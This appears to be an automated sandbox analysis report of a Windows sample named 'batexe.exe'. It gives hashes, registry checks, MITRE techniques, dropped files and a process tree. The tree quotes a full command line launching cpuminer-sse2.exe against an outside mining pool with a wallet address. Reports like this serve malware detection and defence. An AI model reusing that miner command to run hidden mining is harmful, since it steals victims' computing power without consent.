73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
303s
max time network
311s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
14-02-2024 11:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4892	b2e.exe
3116	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe
3116	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1480-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1480 wrote to memory of 4892	1480	batexe.exe	85
PID 1480 wrote to memory of 4892	1480	batexe.exe	85
PID 1480 wrote to memory of 4892	1480	batexe.exe	85
PID 4892 wrote to memory of 456	4892	b2e.exe	86
PID 4892 wrote to memory of 456	4892	b2e.exe	86
PID 4892 wrote to memory of 456	4892	b2e.exe	86
PID 456 wrote to memory of 3116	456	cmd.exe	89
PID 456 wrote to memory of 3116	456	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Users\Admin\AppData\Local\Temp\3FB4.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\3FB4.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3FB4.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4CB4.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:456
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3FB4.tmp\b2e.exe

Filesize
434KB

MD5
97d0a077ac2e219de3ae995904851ab7

SHA1
4090765bd8c9ed340407dc77bf013b6a009449a7

SHA256
2dc48592187506e2b2189d3b9a486f2e7219fbb5a580c6e462d03f4462c9d9fa

SHA512
d2c9078e8bafa2008c141aa8680c9c33a472159594e1cc237931823c20a81a24fe530a11998d60a1969ff134ce0b0969b1154f29ee791ab54a355785d52ca0ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\3FB4.tmp\b2e.exe

Filesize
756KB

MD5
852729a14481c9193b8b5751c00f4295

SHA1
423aa338d2855249398df6d309e4a48bc4009e09

SHA256
217f5251753f05af8cee91e4303dfdfc8e4ebb873a2c09f8a495aadf98830bb6

SHA512
fe4036e15e5fc99d79815efad290733d9f4fd422037dd78dc1567d3f5ac9151e8bf3f29deffa2749607031473be4b77a1bbd98f370a8eef156538ac583ac2c0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\3FB4.tmp\b2e.exe

Filesize
517KB

MD5
dd41ea3c20ec5c610fc5077cfae180ef

SHA1
842a22e564865cecd8ee957728490684ef620e1e

SHA256
7c28dc570a41172c0be6cdeb282dc6543c20658fe1be4c43f5b416c44ea8c6c5

SHA512
158c38cc0940c2677eef4850aed9c6f5f6addc769fe4a7bbb1f8e621efdb11645659432c9c4e54d8641eae488943e4ed361d6660879ea8488606f3e4edac55a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\4CB4.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
327KB

MD5
733c1ad42efa1a598de073ad3548b63b

SHA1
e968e0a64bc9f611e3a9a44195dcc475e002b81c

SHA256
b94cdf325e5fdc5555fb934ea199f1b7844f90ab9641a19a0ba4003a6be9ed2a

SHA512
de6eb495960eca69fd15d2aa0399bb13ffdb569727b400297133498a56efdd891d815910573b76772fc8a75f02bc4197943b27a2abbe1c9c718d09175fedaaed

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
400KB

MD5
7da2d8f5171451e6d481643884f09f44

SHA1
d9fd97ef74d18994f926970b92b8c9763651acf2

SHA256
84087975a4658f0bf45d8334d863fcb4dff28ad37cbc762410e3347a91d2aaeb

SHA512
608b00b3d288be21620fb623eedf2d2a3dcb62cf9e86967db9f911f399cfae25179fcf0fe16cd7aec16177657cc3af99aa8a3a7c5a386ccf1c6459366a2d302d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
250KB

MD5
d603d475ea2cb7181cc27f1fca444c45

SHA1
6a07d2db3c619927b68e914fa501f4df81237db2

SHA256
a205128f4aa5507d6bd17f16fd11a0724a8d29b366b0c4601aa144f77ac42ffa

SHA512
25a795341d786e79df07570232cafc2543b5e4157b7318f6e25e8b0cced470865426b264ac3f3b34ca99dd24178aa582e3581b117e38c64b592568cc1d0b8a19

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
467KB

MD5
5d66fa81fd6b6f87f59b765dcdf17e76

SHA1
92c8df531a9c41ae1397c25be16dece9f9ff48c4

SHA256
27eddd13f01c1a4111bf5d1f0bc11aadbb1a44ce1d1bdbd13afe9215c39d8c2a

SHA512
809dced4bf53ff5dc1817da2ae188dfc30de8c89985cdf5279e0c392bcf990ef39a08abb8ea3786f9598492eda25d45c6b1bd4b0c395701830a9116fd6dbf0ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
515KB

MD5
8ff52d69cc7b8bb0c2b78f3a700f01a7

SHA1
bf4d6ae03370a85740ed93fe5bae527044300490

SHA256
0365fd660399465c7e4401324da2f602a94c4dcfd95bad25105b935b094e9771

SHA512
328bcda22dd0fecb6cd08e725d31c84b2d6dfbc644dd1df72fc4f1a5077f1e46efe5b0f5abea869ddcecdd6b1048474e7bf5324898f172c24c1a156f33e7a70a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
276KB

MD5
2775cc96d834a56c1dfad839512c36ea

SHA1
d09ebe0b598afd391c804123a40e61e50639e0f1

SHA256
06747af5721d0e9af1b23784962ca152e6d0d4b50508088e9587995add83f19e

SHA512
ba670b06b660ea262b057ff6d3c51cba3c18333c921ada6bc4f56b3fe42579308abaf039ab7922482118081354da44f4de3852e897e2d2d855155defd8cfb1fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
299KB

MD5
6c5b0fbd8833bab9f3caf59bc0ea0a6e

SHA1
b4bf56814e9e172fc3f23a0303adf097ff918449

SHA256
796324e701a9158e98ac7295aadefca5a62976111aed3b8fc3f3162760547bb7

SHA512
0217d1fbb25090580ae28594cf8dd00ba7204c2192f68be68cb25b4d725c1b74d7815440c1f4a9d8143180ea18f21ac1bb1c1d1e611c0b98a4703eee850346be

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
175KB

MD5
eb72d3166abc0cb98d7568a0e2dd6d97

SHA1
2c75930883c01495311beb7ecc886876233a0d8e

SHA256
bd07af6d34eb4fc3d08c1a8809c57a9bf77a1d7a3d481545ee49aec71b8b79f7

SHA512
ade8494e427d82fea1d89045627c414c3ab0266a7a405f4ec6b16e80f747652f512c9efec1223927880921edeff82ea03530789397d803df2d5df4eb812fd597

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
456KB

MD5
9665bb20434f21eaaf11860eef01698f

SHA1
c7d9a68ccd4a6d470dd7bee0d0cb70b56e0b25af

SHA256
4db713a34f08864ae004b3a6d555d655ce56a65dd42d18ea50d7d1d923a3f555

SHA512
6b3ea16b48efc03164f849f0203ef2bba63f5bf7ff9adcb1a0e6d74849201637d7765ec41f4d73cfc6bcbc42a1c129224af491b45f79c650b7675a83786156ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
442KB

MD5
52e8d0dae33dc522e36eb4e2d2797750

SHA1
6a4c4d83cadbf32c78aa1807d19dea0e31379ebb

SHA256
0c15333bbb67753ac4debe1868e021e19fb3d092c2ba0170fadc1389ccafc6ac

SHA512
ef5a737b8b4c27ed75c76e6a436fa127e5743a0fe2b6ad1a3b1a77cc517827d845f7abd1e1e968c34f52c38d1920c5b3e8500b86f1739e93fa79de0927d9c66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
217KB

MD5
834b45280cce6e52d41c22f2bf877494

SHA1
43e5b5951c10fae091f335c9b33236b8886be1bc

SHA256
dc5abe51cbc9a54856634c75653947238de87f5503ec7cd7311831366a7435c7

SHA512
e2c583898c9951b59e28b0452559aa2743472c33b98e7033aed5f253270a00cdff9baa5d0349ccfe343c72654b69445b32d4e0cb05e09687b4f3f819769046aa

Download Submit
memory/1480-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3116-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3116-45-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/3116-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3116-47-0x0000000001080000-0x0000000002935000-memory.dmp

Filesize
24.7MB

Download
memory/3116-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3116-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4892-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download